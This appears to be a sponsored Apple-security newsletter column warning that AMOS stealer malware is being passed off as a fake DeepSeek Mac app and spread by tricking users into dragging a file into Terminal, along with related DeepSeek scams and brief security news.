Presenting DMN Security Bite, proudly sponsored by Mosyle, the only Unified Platform for Apple. Our sole focus is to ensure your Apple devices are ready for work and secure. We uniquely combine advanced Apple-specific security measures for complete automated Hardening & Compliance, Next Generation EDR, AI-driven Zero Trust, and unparalleled Privilege Management with the leading and most innovative Apple MDM available. Trusted by over 45,000 organizations, we help make millions of Apple devices operational effortlessly and affordably.Request your EXTENDED TRIAL today and discover why Mosyle is your ultimate solution for Apple management.
Are you tired of hearing about DeepSeek? This chatbot from China has made waves in the tech world this week, taking the top spot on the App Store and stealing headlines. However, its quick rise to fame has also prompted a surge in phishing attempts, investment fraud, and macOS malware masquerading as legitimate DeepSeek apps. Here’s what you need to know.
Welcome to DMN Security Bite, your weekly source for insights on data privacy, updates on recent vulnerabilities, and emerging threats in Apple’s expansive ecosystem of over 2 billion active devices.
Cyble, a prominent cybersecurity firm, is monitoring several new scams leveraging DeepSeek’s popularity. These scams include cryptocurrency frauds where criminals coerce victims into scanning QR codes to access crypto wallets, as well as counterfeit investment schemes. I’ve noticed numerous deceiving DeepSeek installations for Mac, featuring credible-looking file names, but there’s a catch: DeepSeek hasn’t released a Mac application.
Alongside these phishing and counterfeit investment efforts, cybercriminals are peddling AMOS (Atomic), a prominent type of stealer malware on macOS, disguised as a DeepSeek Mac application. AMOS is distinct because it’s developed using Apple’s Swift language and is compatible with both Intel and Apple Silicon CPUs. This, paired with its ingenious distribution method, makes AMOS exceptionally effective. Malware creators have turned it into a subscription model, costing $1,000 monthly.
Fortunately, experts have conducted thorough dynamic and code analysis to unveil its workings. Upon infection, the malware executes scripts to establish a Command and Control (C2) server, allowing for bi-directional communication with the victim’s Mac. This setup enables attackers to issue commands and, more critically, retrieve compromised data, which typically includes iCloud Keychain passwords, credit card details, sensitive documents, and crypto wallet keys stored in browsers.
Thanks to the release of macOS Sequoia, Apple has taken measures to prevent average users from running malware on their machines. Users running Sequoia no longer have the option to control-click to bypass Gatekeeper and install unsigned or unnotarized software. However, as reported last year, hackers have circumvented this by guiding users to enter malicious code directly into the Terminal app.
This same method is being utilized with the bogus DeepSeek applications.
Here’s how the scheme operates:
- The victim downloads the harmful DMG file from a website, email, or other sources.
- The attacker instructs the victim to launch Terminal and drag the “.file” directly into the Terminal instead of right-clicking to install.
- The seemingly benign “DeepSeek.file” is filled with harmful Bash scripts. Dropping it into Terminal triggers its execution, leading to disaster for the victim.
DeepSeek solely provides apps for iOS and Android. Any software requesting you to drop files into Terminal is malicious.
Moreover, as a precautionary measure, it’s advisable to steer clear of DeepSeek altogether. As a Chinese-based LLM chatbot, it is subject to local laws that involve stringent censorship and total access to user data. Engaging with DeepSeek poses significant risks to your privacy and may potentially facilitate cyber-espionage efforts against you.
I would love to hear your opinions. Do you have concerns regarding DeepSeek’s implications for privacy?
More Insights on Apple Security
- Concerns regarding DeepSeek’s privacy have triggered investigations in the US and Europe, leading to its removal from the App Store in Italy. Other countries may follow suit.
- Security experts have identified two vulnerabilities affecting all current iPhones, iPads, and Macs, as well as many earlier models. The weaknesses, known as SLAP and FLOP, could grant attackers visibility into open web tabs.
- A judge has restricted the FBI’s powers to sift through data obtained from tech companies such as Apple, Google, and ISPs under the Foreign Intelligence Surveillance Act (FISA).
- Learn how hackers continue to exploit Google Ads to distribute malware. In 2025, how can Google, equipped with DeepMind and ample resources, still permit this?
Thank you for taking the time to read!
Follow Arin: LinkedIn, Threads,
BlueSky, X
: . More.
